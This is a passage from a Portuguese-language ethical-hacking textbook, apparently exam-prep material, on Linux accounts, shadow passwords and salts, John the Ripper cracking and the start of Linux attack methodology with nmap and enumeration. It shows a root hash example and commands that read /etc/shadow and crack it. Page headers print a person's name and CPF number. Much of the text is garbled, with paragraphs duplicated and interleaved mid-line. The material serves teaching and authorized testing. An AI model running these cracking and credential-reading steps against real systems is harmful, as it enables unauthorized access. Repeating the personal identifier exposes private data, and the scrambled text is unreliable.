Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24

Este é o projeto sob o Red Hat, uma abordagem chamada de grupos de usuários privados.

5- O quinto campo é a descrição do usuário. Esta área possui informações descritivas sobre
o usuário. Por vezes, pode conter números de telefone, paradas
paradas de correio, ou alguma outra
outr a
informação de contato. Esta não é uma boa idéia de como ele pode ser relatado pelo
utilitário finger.

6- O sexto campo é o diretório home do usuário. Quando o usuário é autenticado, o programa de


login utiliza este campo para definir variável $ HOME do usuário. Por padrão, em todas as
distribuições Linux, o diretório home do usuário será assumido ser / home / username.
username.

7- O sétimo campo e último é o Shell de login do usuário. Quando o usuário é autenticado, o


programa
Este é de login também
o projeto sob o Red define
Hat,ouma
SHELL usuárioschamada
abordagem com variável $ a este
de grupos campo. Por
de usuários padrão,
privados.
em todas as distribuições Linux, o shell de um novo usuário de login será definido por / bin /
bash,
bash5-, oOBourne
quinto Again
campoShell.
é a descrição do usuário. Esta área possui informações descritivas sobre
o usuário. Por vezes, pode conter números de telefone, paradas de correio, ou alguma outr a
Adicionar usuários ao Linux é um processo bastante simples. Apenas o comando useradd. De
informação de contato. Esta não é uma boa idéia de como ele pode ser relatado pelo
todos os usuários, o que exige uma maior proteção é a conta conta root, porque ela deve ser segura.
utilitário finger.
Embora os arquivos como passwd sejam lidos por todos, o arquivo shadow é legível apenas pelo
usuário
6- O sextoroot. Se um
campo é oatacante
diretóriopode
homeobter
do acesso
usuário.à Quando
conta root, ele tem,é essencialmente,
o usuário tomado ode
autenticado, o programa
controle do computador
login utiliza este campo paraa partir de você.
definir Por esta
variável e$sta
HOMErazão,doa conta root
usuário. Pordeve ser protegida
padrão, em todasno
as nível
mais alto. IssoLinux,
distribuições significa que umahome
o diretório grande
grande
do quantidade
usuário serádeassumido
tempo que seros usuários
/ home exercem. as suas
/ username
funções em um computador Linux Linux com uma um a conta diferente de root. No entanto, algumas
funções exigem
7- O sétimo campo queevocê
últimoas éexecute
o Shellcomo [Link]
de login essasQuando
usuário. ocasiões, você vaiéquerer
o usuário usar o o
autenticado,
Substituto
programa de dologin
usuário de comando
também define o(SU).
SHELLO comando
usuáriosSU comlhevariável
permitirá
$ adesempenhar funções
este campo. Por padrão,
como
em todas um as
usuário diferenteLinux,
distribuições daquele que você
o shell de umestá
novologado.
usuárioO comando é simplesmente
de login será definido por / bin /
<username> su
su..
bash, o Bourne Again Shell.

Adicionar
Senhas e ousuários
arquivoaoshadow
Linux é um processo bastante simples. Apenas o comando useradd. De
todos os usuários, o que exige uma maior proteção é a conta root, porque ela deve ser segura.
Embora os arquivos como passwd sejam lidos por todos, o arquivo shadow é legível apenas pelo
Linux requer que as contas de usuários tenham uma senha,
senha, mas por padrão, não vai impedi-lo de
usuário root. Se um atacante pode obter acesso à conta root, ele tem, essencialmente, tomado o
começar um um jogo em branco. Durante a instalação, o Linux dá ao usuário a opção de
controle do computador a partir de você. Por esta razão, a conta root deve ser protegida no nível
configurar o padrão de criptografia de senha. A maioria das versões do Linux, como a Red Hat,
mais alto. Isso significa que uma grande quantidade de tempo que os usuários exercem as suas
usa MD5 por padrão. Se você optar por não usar MD5, você pode escolher DES, embora limita
funções em um computador Linux com um a conta diferente de root. No entanto, algumas
as senhas a oito caracteres alfanuméricos. Linux também inclui o arquivo / etc / shadow para
funções exigem que você as execute como root. Para essas ocasiões, você vai querer usar o
segurança de senha adicional. Dê uma olhada em uma entrada de um arquivo / etc / shadow
Substituto do usuário de comando (SU). O comando SU lhe permitirá desempenhar funções
aqui:
como um usuário diferente daquele que você está logado. O comando é simplesmente
Senhas e o arquivo
<username> su. shadow
root:$1$Gjt/eO.e$pKFFRe9QRb4NLvSrJodFy.:0:0:root:/root:/bin/bash

Movendo as senhas para shadow torna menos provável que a senha criptografada
criptografada possa ser
decifrada, pois somente o usuário root tem acesso ao arquivo shadow.
shadow. O formato do arquivo de
Linux requer que as contas
senha é formatado como segue:de usuários tenham uma senha , mas por padrão, não vai impedi-lo de
começar um um jogo em branco. Durante a instalação, o Linux dá ao usuário a opção de
Account_name:Password:Last:Min:Max:Warn:Expire:Disable:Reserved
configurar o padrão de criptografia de senha. A maioria das versões do Linux, como a Red Hat,
usa MD5 por padrão. Se você optar por não usar MD5, você pode escolher DES, embora limita
as root:$1$Gjt/eO.e$pKFFRe9QRb4NLvSrJodFy.:0:0:root:/root:/bin/bash
senhas a oito caracteres alfanuméricos. Linux também inclui o arquivo / etc / shadow para
segurança de senha adicional. Dê uma olhada em uma entrada de um arquivo / etc / shadow 8
aqui:

Movendo as senhas para shadow torna menos provável que a senha criptografada possa ser
Account_name:Password:Last:Min:Max:Warn:Expire:Disable:Reserved
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24

Se você estiver conectado


conectado em um root e gostaria
gostaria de ver as senhas em shadow em seu
seu computador, use
use
o seguinte comando:
comando:

more /etc/shadow

Outro fato interessante


interessante sobre sistemas Linux é que as senhas usam sais. Sais são necessários
necessários para adicionar
uma camada de aleatoriedade
aleatoriedade para as senhas. Porque MD5 é um um algoritmo de hash,
hash, isso significa que se
se eu
usasse "segredo"
"segredo" para a minha
minha senha e outro usuário
usuário usado "segredo" para a sua senha, valores
valores
criptografados seria o mesmo. Um sal pode pode ser um dos
dos valores de 4096 e ainda ajuda a embaralhar
embaralhar a
senha. No Linux, a senha
senha MD5 é de 32 caracteres e começa
começa com $ 1 $. Os caracteres
caracteres entre o segundo
segundo e
terceiro $ representar
representar o sal. No exemplo
exemplo anterior, o valor que é GJT / eO.e.
eO.e. Senhas criadas desta
desta maneira
são consideradas de ser ser one way. Isto é, não há uma maneira fácil
fácil de reverter o processo. Figura 5.2
Se vocêcomo
demonstra estiver
com conectado
o o Linux em valor.
cria este umor.
val root e gostaria de ver as senhas em shadow em seu computador, use
moreo seguinte comando:
/etc/shadow

Outro fato interessante sobre sistemas Linux é que as senhas usam sais. Sais são necessários para adicionar
uma camada de aleatoriedade para as senhas. Porque MD5 é um algoritmo de hash, isso significa que se eu
usasse "segredo" para a minha senha e outro usuário usado "segredo" para a sua senha, valores
criptografados seria o mesmo. Um sal pode ser um dos valores de 4096 e ainda ajuda a embaralhar a
senha. No Linux, a senha MD5 é de 32 caracteres e começa com $ 1 $. Os caracteres entre o segundo e
terceiro $ representar o sal. No exemplo anterior, o valor que é GJT / eO.e. Senhas criadas desta maneira
são consideradas de ser one way. Isto é, não há uma maneira fácil de reverter o processo. Figura 5.2
demonstra como o Linux cria este valor.

Dica
Como o arquivo passwd é legível ao mundo, as senhas
senhas devem ser armazenados
armazenados no
no arquivo shadow.

O arquivo shadow não não é a única maneira de ajudar ajudar a proteger contra invasores que tentam evitar o
processo de autenticação.
autenticação. Há outras formas mais avançadasavançadas para proteger os recursos. As senhas são são
um das mais fracas formas
formas de autenticação. Há também algo algo que você tem (tokens) e algo algo que você é
(biometria). Se umum novo esquema de autenticação
autenticação que vai ser utilizada, é necessário
necessário que haja uma
forma de alertar as aplicações para esse fato fato sem ter que
que reescrever cada parte do código já
Dicadesenvolvido. A resposta
resposta a este desafio
desafio é PlPluggable Authentication Modules (PAM). PAM permite que
uggable Authentication
um programa projetado
projetado para renunciar
renunciar a preocupação
preocupação dos tipos de autenticação
autenticação que serãoserão executadas
e se concentrar no no próprio aplicativo. PAM é usado pelo FreeBSD, Linux, Solaris e outros. Seu papel é
Como o arquivo passwd é legível ao mundo, as senhas devem ser armazenados no arquivo shadow.
controlar
co ntrolar a interação
interação entre o usuário e autenticação. Isso Isso pode ser telnet, ftp, login no console,
console, ou
alterar uma senha. PAM PAM apoia os regimes
regimes mais fortes de autenticação, como como o Kerberos, S / Key, e
O arquivoO shadow
RADIUS. diretórionã
diretório o écontém
que a única os
maneira
módulos
módulos de específicos
ajudar a proteger
para ocontra
PAM está
PAM invasores
em / etcque tentam
m.d /.evitar o
/ pam.d
pa
processo de autenticação. Há outras formas mais avançadas para proteger os recursos. As senhas são
Alerta
um dasde Exame
mais fracas formas de autenticação. Há também algo que você tem (tokens) e algo que você é
(biometria).
Entender o quequeusão
Se m novo
sais eesquema de autenti
porque eles
porque cação que vai ser utilizada, é necessário que haja uma
sãoPlusados.
uggable Authentication Modules
forma de alertar as aplicações para esse fato sem ter que reescrever cada parte do código já
Toda essa conversa
desenvolvido. de ta
de
A respos senhas
a estetraz a questão
ques
desafi o é tão da segurança da senha.
senha. Assim como (PAM).noPAMmundo da que
permite
Microsoft,
um programa o Linux também
projetado tem
para renuuma
uma série
nciar de ferramentas
ferramentas
a preocupaçã o dosde quebra
tipos de senha
de autentic açãodisponível.
disponível.
que serãoJohn the
executadas
e se concentrar
Ripper denssas
é uma dessas o próprio aplicativo.
ferramentas (http
(httpPAM é usado pelo FreeBSD,
[Link]
://[Link]/John/
://[Link] m/John/).
m/John/ Linux, Solaris e outros.
ente, aSeu
). É, provavelmente,
provavelm mais papel é
conhecida,
controlar a mais versátil,
versátil,
interaçã o entremais rápida eprogra
o usuário programama de quebra
autenticação. de senhas
Isso pode senhas [Link],
ser telnet, O melhor
me lhor
login node tudo,e,éou
consol
alterar uma
gratuito [Link]
e suporta sPA
eisM apoia os diferentes
esquemas regimes mais de fortes
hash dedesenha
autenticação,
cobrco
que cobrememmo o Kerberos,
vários saboresSde
sabores / Key,
UNIXe e
Windows
RADIUS. OLANMan
diret
Alerta de Exame ório hashes.
que Pode
contém usar
os m listas
ódulos de palavras
específicosespecializadas
para o PA M ou
está regras
em / de
etc /senha
pa m.d c
com
om
/. base no

Entender o que são sais e porque eles são usados. 9

Toda essa conversa de senhas traz a questão da segurança da senha. Assim como no mundo da
Microsoft, o Linux também tem uma série de ferramentas de quebra de senha disponível. John the
Ripper é uma dessas ferramentas ([Link] É, provavelmente, a mais
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24

tipo de personagem
personagem e colocação. Roda em em mais de 12 diferentes
diferentes sistemas operacionais.
operacionais. Vem pré-
instalado em muitas distribuições
distribuições Linux. Está incluído
incluído na versão do Linux Knoppix encontrado
encontrado no CD
neste livro. Antes de sair e começar a quebrar
quebrar senhas, gaste algun
algunss minutos para verificar as várias
opções emitindo -.-./john-h
/john-h na linha de comando.
comando. Você pode verificar queque John funciona executando
executando em
modo de teste. Irá gerar uma velocidade de de linha de base para o seu sistema de craqueamento.
craqueamento.

[root@mg /root]#./john -test


Benchmarking: Traditional DES [32/32 BS]... DONE
Many salts: 160487 c/s real, 161600 c/s virtual
Only one salt: 144262 c/s real, 146978 c/s virtual

Benchmarking: BSDI DES (x725) [32/32 BS]... DONE


tipo
Many de personage5412
salts: m e colocação.
c/s real,Roda5280
em mais
c/sdevirtual
12 diferentes sistemas operacionais. Vem pré-
Only one salt: 5889 c/s real, 5262 c/s virtual
instalado em muitas distribuições Linux. Está incluído na versão do Linux Knoppix encontrado no CD
neste livro. Antes
Benchmarking: de sair eMD5
FreeBSD começar a quebrar
[32/32 X2]...senhas,
DONEgaste alguns minutos para verificar as várias
opções emitindo -./john-h na linha de comando. Você pode verificar que John funciona executando em
Raw: 3666 c/s real, 3246 c/s virtual
modo de/root]#./john
[root@mg teste. Irá gerar uma velocidade de linha de base para o seu sistema de craqueamento.
-test
Benchmarking: OpenBSD Blowfish (x32) [32/32]... DONE
Benchmarking:
Raw: 241 c/s real, 227 DES
Traditional c/s [32/32
virtualBS]... DONE
Many salts: 160487 c/s real, 161600 c/s virtual
Only one salt:Kerberos
Benchmarking: 144262 c/sAFS real, 146978
DES [24/32 c/s virtual
4K]... DONE
Short: 70438 c/s real, 72263 c/s virtual
Benchmarking:
Long: 192506BSDIc/s DES
real, (x725)
200389 [32/32 BS]... DONE
c/s virtual
Many salts:
Benchmarking: NT5412 c/s[32/32
LM DES real, BS]...
5280 c/s virtual
DONE
Only
Raw: one1808844
salt: 5889 c/s real,
c/s real, 18775535262c/sc/s virtual
virtual
Benchmarking: FreeBSD MD5 [32/32 X2]... DONE
Raw: 3666 c/s real, 3246 c/s virtual
Reveja os resultados do MD5 FreeBSD e benchmarks NT LM LM DES. As rachaduras por diferença (c
/Benchmarking:
s) segundos entreOpenBSD
os dois éBlowfish
um fator de mais de 500, o que
(x32) [32/32]... DONEsignifica que um ataque de força bruta
completo levará
Raw: 241 c/smais de 500227
real, vezes
c/so tempo
virtualcontra os hashes de senha no sistema FreeBSD do que
contra um sistema Windows. Um desses sistemas que você prefere mantem os dados críticos?
Benchmarking: Kerberos
Depois de toda essa conversaAFS
sobreDES [24/32
quebra 4K]...
desenhas, DONE
você pode querer dar uma chance a si mesmo.
Short: 70438 c/s real, 72263 c/s virtual
Se assim
Long:
for, faça o exercício do desafio abaixo.
192506 c/s real, 200389 c/s virtual
Benchmarking: NT LM DES [32/32 BS]... DONE
Alerta
Raw: de exame
1808844 c/s real, 1877553 c/s virtual

Candidatos ao teste
teste devem saber como os programas
programas de quebra
quebra de senha, como John
John the Ripper,
Ripper,
trabalh am..
trabalham
am

Desafio
Reveja os resultados do MD5 FreeBSD e benchmarks NT LM DES. As rachaduras por diferença (c
/ s) segundos entre os dois é um fator de mais de 500, o que significa que um ataque de força bruta
Proteção
completode senhas
levará maisé tão importante
de 500 vezes oem qualquer
tempo contraplataforma
os hashes como construir
de senha senhas
no sistema [Link]
FreeBSD que
desafio
contra de
Alerta terá
umexame que criar senhas de complexidade diferentes e tentar quebrá-las. O
sistema Windows. Um desses sistemas que você prefere mantem os dados críticos? objetivo é ver a
rapidez
Depois decom senhas
toda essa fracas podem
conversa sobreserquebra
quebradas. Vocêvocê
desenhas, vai precisar de uma
pode querer dar cópia do Linux
uma chance a siemesmo.
John
the Ripper
Se assim for,
Candidatos para realizar
aofaça
testeodevem este
exercícioexercício.
saberdocomo
desafioÉ sugerido
rogramas de quebra de senha, como John the Ripper, CD
os pabaixo. que você use a cópia do Linux incluído no
com este
trabalham livro. Ela pode ser carregada em um segundo CD que será auto-arranque. Como
alternativa, você também pode fazer download de DST Knoppix em: em: [Link] e instale em em
um cd. .

1) Iniciar o CD Knoppix STD.


S TD.
Desafio
2) Abrir uma janela
janela de terminal e vá para o diretório john. Digite cd / etc / john.

Proteção de senhas é tão importante em qualquer plataforma como construir senhas robustas. Este 10
desafio terá que criar senhas de complexidade diferentes e tentar quebrá-las. O objetivo é ver a
rapidez com senhas fracas podem ser quebradas. Você vai precisar de uma cópia do Linux e John
download
the Ripper para realizar este exercício. de DST
É sugerido queKnoppix ema: [Link]
você use cópia do Linux incluído no CD
com este livro. Ela pode ser carregada em um segundo CD que será auto-arranque. Como
alternativa, você também pode fazer e instale em
um 1)
cd.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55

3) Antes de tentar
tentar quebrar as senhas existentes, entre mais alguns usuários para ver o quão
rápido as senhas podem ser quebradas. Use o comando adduser para adicionar três usuários.
Nomeie os três usuários user1, user2 e user3. Defina a senha para cada usuário com
password,, ssw0rd P @ e! P @ ssw0rd1. Por exemplo, para adicionar o usuário user1 com o
password
diretório home / home/users/user1, digite o seguinte comando:

adduser usuário1-d / home/users/user1.

Em seguida definir a senha. Para fazer isso, digite o seguinte comando:

passwd username (onde username é o nome


nome do novo usuário)
usuário)
3)
4) Após os três
três usuários foram adicionados,
adicionados, você vai querer executar
executar John. Isso pode
pode ser feito
digitando . / John / etc / shadow a partir da linha de
de comando.
Antes de tentar quebrar as senhas existentes, entre mais alguns usuários para ver o quão
rápido as senhas podem eser quebradas. Use o comando adduser para adicionar três usuários.
Nomeie
5) Dê os três
um tempo
tempo usuários
para user1,
ver quanto
quan user2
to tempo e user3.
leva Defina
para cada a senha
senha
senha para
para ser cadada.
quebra
[Link]ário com
Registrar esses
password , ssw0rd P
momentos aqui: User1:@ ! P @ ssw0rd1 . Por
User1: _____ Usuário2: _____ exemplo, para
_____ Usuário3: _____
_____ adicionar o usuário user1 com o
diretório home / home/users/user1, digite o seguinte comando:
Você notou uma correlação
correlação entre o tempo
tempo que levou para quebrar uma senha versus a complexidade
complexidade da
adduser
senha?? Você
senha deveusuário1-d
deve / home/users/user1.
ter visto que as senhas mais complexas
complexas demoram mais para se
se recuperar.
passwd username (onde username
Para éfazer
o nome dodigite
novo usuá rio) comando:
John theEm seguida
Ripper é umadefinir a senha.
ferramenta
ferramenta maravilhosa isso,
para hackers o seguinte
éticos para testar a força da senha, no
entanto, ela não foi projetado
projetado para a atividade ilegal. Antes de usar esta
esta ferramenta
ferramenta em uma rede de
4) Após os três usuários foram adicionados, você vai querer executar John. Isso pode ser feito
produção, certifique-se que
que você tenha autorização
autorização por escrito da gerência maior. John the Ripper
Ripper realiza
digitando . / John / etc / shadow a partir da linha de comando.
diferentes tipos de quebras:
quebras: modo único; dicionário,
dicionário, ou o modo de lista de palavras,
palavras, a realizada neste
neste
exercício, que aplica uma
uma lista de dicionário de senhas
senhas para comparação,
comparação, e força bruta
bruta ou o modo
incremental, que é o mais lento dos três modos
modos e tenta todas as combinações
combinações de letras e números.
números. John
5) Dê um tempo para ver quanto tempo leva para cada senha para ser quebrada. Registrar esses
the Ripper é portátil para vários sabores de UNIX,
UNIX, Linux e Windows, embora
embora ele não tenha
tenha uma interface
momentos aqui: User1: _____ Usuário2: _____ Usuário3: _____
gráfica.
Você notou uma correlação entre o tempo que levou para quebrar uma senha versus a complexidade da
Comprimindo, Instalando
Instalando
senha? Você deve ter visto que asesenhas
Compilando
Compilan do o xas
mais comple Linux
demoram mais para se recuperar.

John the Ripper é uma ferramenta maravilhosa para hackers éticos para testar a força da senha, no
Objetivo:
entanto, ela não foi projetado para a atividade ilegal. Antes de usar esta ferramenta em uma rede de
produção, certifique-se
Descrever como que Linux
programas
programas você tenha autorizaos,
são compilados,
compilad çãocarregadas,
por escritoeda gerência
compri maior. John the Ripper realiza
comprimidas.
midas.
diferentes tipos de quebras: modo único; dicionário, ou o modo de lista de palavras, a realizada neste
exercício, que aplica uma lista de dicionário de senhas para comparação, e força bruta ou o modo
incremental, que é o mais
Em Linux, arquivos lento dos três m
são empacotados e odos e tenta todas
compactados as combinações
de várias [Link]
doseformatos
nú[Link]
the Ripper é portátil para vários sabores de UNIX, Linux e Windows, embora ele não tenha uma interface
compressão
gráfica. mais comuns é o programa de arquivamento em fita (Tar). Tar é um arquivo padrão e
foi originalmente desenvolvido como software de backup para UNIX. Ela recolhe vários arquivos
em um único arquivo. Ele não faz a compactação de arquivos e, portanto, um segundo programa é
necessário. Um programa
Comprimindo, chamado
Instalando gzip é umdo
e Compilan doso programas
Linux de compressão mais comuns de
arquivo.
Objetivo: Compilando um pacote de uma fonte de código tarball nem sempre é um procedimento
simples. Após descompactar o pacote, você deve procurar por um arquivo chamado README,
[Link],
Descrever [Link],
como programas ou algo similar.
Linux são compilados, carregadas, e compriEste arquivo geralmente descreve
midas.
o processo de configuração e instalação. Freqüentemente, o pacote fonte inclui um script chamado
configure, que você executa para ter o pacote de auto detecção de bibliotecas instaladas do seu
computador e configurar-se de forma adequada. Se assim for, o processo inclui três comandos:
comandos:

Em Linux, arquivos são empacotados e compactados de várias maneiras. Um dos formatos de


11
compressão mais comuns é o programa de arquivamento em fita (Tar). Tar é um arquivo padrão e
foi originalmente desenvolvido como software de backup para UNIX. Ela recolhe vários arquivos
em um único arquivo. Ele não faz a compactação de arquivos e, portanto, um segundo programa é
necessário. Um programa chamado gzip é um dos programas de compressão mais comuns de
arquivo. Compilando um pacote de uma fonte de código tarball nem sempre é um procedimento
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55

 ./configure
 make
 make install

Dica:

Certifique-se de que você sabe como saber se a senha foi colocada no shadow (shadowded).

Dica

Conheça os três comandos usados para compilar um programa em Linux.
./configure
make
Você pode
makequerer desenvolver programas de si mesmo, e se assim for, o Linux oferece-lhe essa
install
capacidade. Linux vem com o compilador GNU C (GCC). Esta capacidade também vem a calhar
quando você baixar um programa em C a partir de um site de segurança
segurança ou gostaria de verificar um
pedaço
Dica: de código de exploração.
exploração. Com o Linux, muitos
mui tos programas
programas não podem ser cumpridos para
você. O processo de compilação não é muito difícil, e um programa básico e os passos necessários
para compilá-lo são mostrados aqui:
Dica
[root@mg /root]#.vi hello.c
Certifique-se de que você sabe como saber se a senha foi colocada no shadow (shadowded).
#include <stdio.h>
int main(int argc, char ** argv)
{
printf("Hello world!\n");
Conheça
return 0;os três comandos usados para compilar um programa em Linux.
}
Você pode querer desenvolver programas de si mesmo, e se assim for, o Linux oferece-lhe essa
[root@mg /root]#. gcc -o hello hello.c
capacidade. Linux vem./hello
[root@mg /root]#. com o compilador
Hello world!GNU C (GCC). Esta capacidade também vem a calhar
quando você baixar um programa em C a partir de um site de segurança ou gostaria de verificar um
pedaço de código
[root@mg de exploraçã
/root]#.vi o. Com o Linux, mui tos programas não podem ser cumpridos para
hello.c
Em
você.primeiro lugar,
O processo
#include deocompilação
<stdio.h> código de programa foi difícil,
não é muito escrito,eneste caso, o editor
caso,
um programa básicovi efoi
osusado.
passosEm seguida,
necessários
ele
int
parafoi compiladoargc,
main(int
compilá-lo com
são ochar
comando
mostrados gcc-o. Finalmente, ele foi executado por executá-lo a partir da
** argv)
aqui:
{
janela de terminal. / Olá.
printf("Hello world!\n");
Note o. / Na frente do comando. IssoIsso garante que o Linux procure no
diretório 0;
return local para o executável especificado.
}
Hackeamento do Linux
[root@mg /root]#. gcc -o hello hello.c
[root@mg /root]#. ./hello Hello world!
Objetivo

Mostrar com o Linux é hackeado

Hacking de Linux segue a mesma metodologia de base discutida ao longo do livro. As etapas são
amplamente divididas em seis fases:
Em primeiro lugar, o código de programa foi escrito, neste caso, o editor vi foi usado. Em seguida,
eleReconhecimento.
1) foi compilado com o comando gcc-o. Finalmente, ele foi executado por executá-lo a partir da
janela de terminal. / Olá. Note o. / Na frente do comando. Isso garante que o Linux procure no
2) Escaneamento
Hackeamento
diretório doeLinux
local para enumeração.
o executável especificado.
Objetivo
3) Ganhar acesso.

4) Aumento de privilégio.
Mostrar com o Linux é hackeado
12
Hacking de Linux segue a mesma metodologia de base discutida ao longo do livro. As etapas são
amplamente divididas em seis fases:

1) Reconhecimento.

2) Escaneamento e enumeração.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55

5) Manutenção do acesso.

6) Cobrir faixas e colocação de backdoors.

Cada uma dessas fases é discutida em mais detalhe para que você entenda melhor como essas
etapas se aplicam a sistemas Linux e UNIX.

Reconhecimento

Reconhecimento é a coleta de informações sobre passivo e ativo. Isso pode ser por escaneamento do
site organizacional, revendo postagens de emprego, procura nas lixeiras, engenharia
engenharia social, ou usar
qualquer das outras formas discutidas no Capítulo 2, "os fundamentos técnicos do Hacking".
5) Manutenção do acesso.
Dica.
6) Cobrir faixas e colocação de backdoors.
As mesmas técnicas básicas utilizadas para atacar
atacar sistemas
sis temas Linux
Linux também podem ser usadas para
Cada uma dessas fases é discutida em mais detalhe para
atacar computadores com Windows. Estas incluem informações que vocêtécnicas
entendapassivas
melhorecomo
ativasessas
de coleta
etapas se aplicam
Reconhecimento a sistemas Linux e UNIX.
de lixo, como mergulho, exploração portuária,
portuária, rever o site, ler anúncios de emprego, e assim por
diante.

Escanear

Escanear encontraé os
Reconhecimento anfitriões
a coleta e determinasobre
de informações que portas
passivoe aplicações que
e ativo. Isso possam
pode estar
ser por em execução.
escaneamento do
Aqui, você pode ver os resultados que vão começar a diferenciar os sistemas Windows e
site organizacional, revendo postagens de emprego, procura nas lixeiras, engenharia social, ou usar Linux.
Uma grande
Dica.
qualquer das pista
outrasé portas
formasabertas, como
discutidas no 21, 37, 79,2,111
Capítulo "os efundamentos
6000. Aquelas representam
representam
técnicos programas,
do Hacking".
como o Secure Shell (SSH), tempo, finger, sunrpc e X11. Porto scanners scanners e fingerprinting de
software OS serão as ferramentas do comércio. Como um exemplo, considerar considerar uma varredura
executado em um sistema Linux:
As mesmas técnicas básicas utilizadas para atacar sis temas Linux também podem ser usadas para
atacar computadores
[root@mg /root]# comnmapWindows. Estas incluem informações técnicas passivas e ativas de coleta
-O [Link]
de lixo, como mergulho, exploração portuária, rever o site, ler anúncios de emprego, e assim por
Starting
Escanear nmap V. 3.93 ([Link]/nmap/)
diante.
Interesting ports on unix1 ([Link]):
(The 1529 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
Escanear encontra os anfitriões e determina que portas e aplicações que possam estar em execução.
25/tcp open smtp
Aqui,
37/tcpvocê pode
openver os resultados
time que vão começar a diferenciar os sistemas Windows e Linux.
Uma grande pista
79/tcp opené portas abertas,
finger como 21, 37, 79, 111 e 6000. Aquelas representam programas,
111/tcp open sunrpc
como o
[root@mgSecure
139/tcp /root]#
Shell
filtered
(SSH),
nmap -Otempo, finger, sunrpc e X11. Porto scanners e fingerprinting de
[Link]
netbios-ssn
software
513/tcp OS serão
open as ferramentas
login do comércio. Como um exemplo, considerar uma varredura
Starting
1103/tcp emnmap V. 3.93 ([Link]/nmap/)
executado
Interesting um
open sistema Linux:
ports on unix1
xaudio
2049/tcp open nfs ([Link]):
(The 1529
4045/tcp ports
open scanned but not shown below are in state: closed)
lockd
Port
6000/tcp State
open Service
X11
21/tcp
7100/tcp open
open ftp
font-service
23/tcp
32771/tcp open
open telnet
sometimes-rpc5
25/tcp open
32772/tcp open smtp
sometimes-rpc7
37/tcp
32773/tcp open
open time
sometimes-rpc9
79/tcp
32774/tcp open finger
sometimes-rpc11
111/tcp
32775/tcp open
open sunrpc
sometimes-rpc13
139/tcp
32776/tcp filtered
open netbios-ssn
sometimes-rpc15
513/tcp open login
1103/tcp open xaudio
13
2049/tcp open nfs
4045/tcp open lockd
6000/tcp open X11
7100/tcp open font-service
32771/tcp open sometimes-rpc5
32772/tcp open sometimes-rpc7
32773/tcp open sometimes-rpc9
32774/tcp open sometimes-rpc11
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55

32777/tcp open sometimes-rpc17


Remote operating system guess: Solaris 2.6 - 2.7
Uptime 319.638 days (since Wed May 14 19:38:19 2005)

Nmap run completed -- 1 IP address (1 host up) scanned in 7 seconds

Observe que as portas mostrados a partir deste exame são muito diferentes
diferentes do que foi
foi visto a partir
do Windows no início do livro. Portas como 37, 79, 111, e 32.771 são mostradas como abertas.
Você também vai querer perceber que o Nmap identificou o sistema operacional como Solaris.
32777/tcp open sometimes-rpc17
Enumeração
Remote operating system guess: Solaris 2.6 - 2.7
Uptime 319.638 days (since Wed May 14 19:38:19 2005)

Nmap run completed -- 1 IP address (1 host up) scanned in 7 seconds


O escaneamento é apenas o começo. Depois de qualquer tipo de sistema Linux ou UNIX UNIX é
encontrado, ele ainda vai exigir ainda mais de sondagem para determinar o que está funcionando.
Embora explorando a sessão nula do Windows pode estar fora de questão, você ainda pode usar
ferramentas, como bandeira agarradas. Mais importante, se você acha que o alvo é algum sabor de
UNIX, você tem acesso a alguns programas que não são encontrados no mundo do Windows. Por
exemplo, Finger, rwho, rusers, e Simple Mail Transfer Protocol (SMTP) podem ser usados para
Observe que as portas mostrados a partir deste exame são muito diferentes do que foi visto a partir .
alavancar ainda mais o seu conhecimento.
do Windows no início do livro. Portas como 37, 79, 111, e 32.771 são mostradas como abertas.
Enumeração
Você também vai querer perceber que o Nmap identificou o sistema operacional como Solaris
Finger é um programa que diz a você o nome associado a um endereço de e-mail. Pode também
dizer-lhe se os usuários estão conectados no momento no seu sistema ou o seu início de sessão mais mais
recente e possivelmente outras informações,
informações, dependendo dos do s dados que são mantidos sobre os
usuários no computador. Figer originou-se como parte do BSD UNIX.
O escaneamento é apenas o começo. Depois de qualquer tipo de sistema Linux ou UNIX é
encontrado,
Rwho e ruserselesão
ainda vai exigir
chamada ainda mais
de serviços
serviços de sondagem para
de procedimento determinar
remoto (RPC) queo que está dar
podem funcionando.
informações
Embora
sobre os vários usuários do sistema. Executando p rpcinfo contra o sistema vai permitirpode
explorando a sessão nula do Windows pode estar fora de questão, você ainda que usar
um
ferramentas, como bandeira agarradas. Mais importante, se você acha que o alvo é algum
invasor descobra o estado de rwho e rusers. Rusers depende do daemon rwho. Ele lista os usuáriossabor de
UNIX, vocêatem
conectados acesso
todas a algunslocais,
as máquinas programas queformato
em que não são(nome
encontrados
do host,nonome
mundode do Windows. Por
usuário).
exemplo, Finger, rwho, rusers, e Simple Mail Transfer Protocol (SMTP) podem ser usados para
alavancar ainda mais
Outra ferramenta o seu conhecimento.
potencial para usar a enumeração é Simple Mail Transfer Protocol (SMTP).
SMTP às vezes pode ser útil na identificação de usuários. Atacantes ganham esta informação
Finger
usandoéoum vrfyprograma que diz a evocê
SMTP (verificar) EXPNo nome associado
(expandir)
(expandir) a um endereço
comandos. de e-mail.
Estes comandos Pode ser
podem também
usados
dizer-lhe se os usuários estão conectados no momento no seu sistema
para adivinhar utilizadores no sistema. Simplesmente nomes de entrada, ou o seu início de sessão
entrada, e se o usuário existe, maêis
exist e, você
voc
recente e possivelmente outras
receberá de volta um endereço informaç
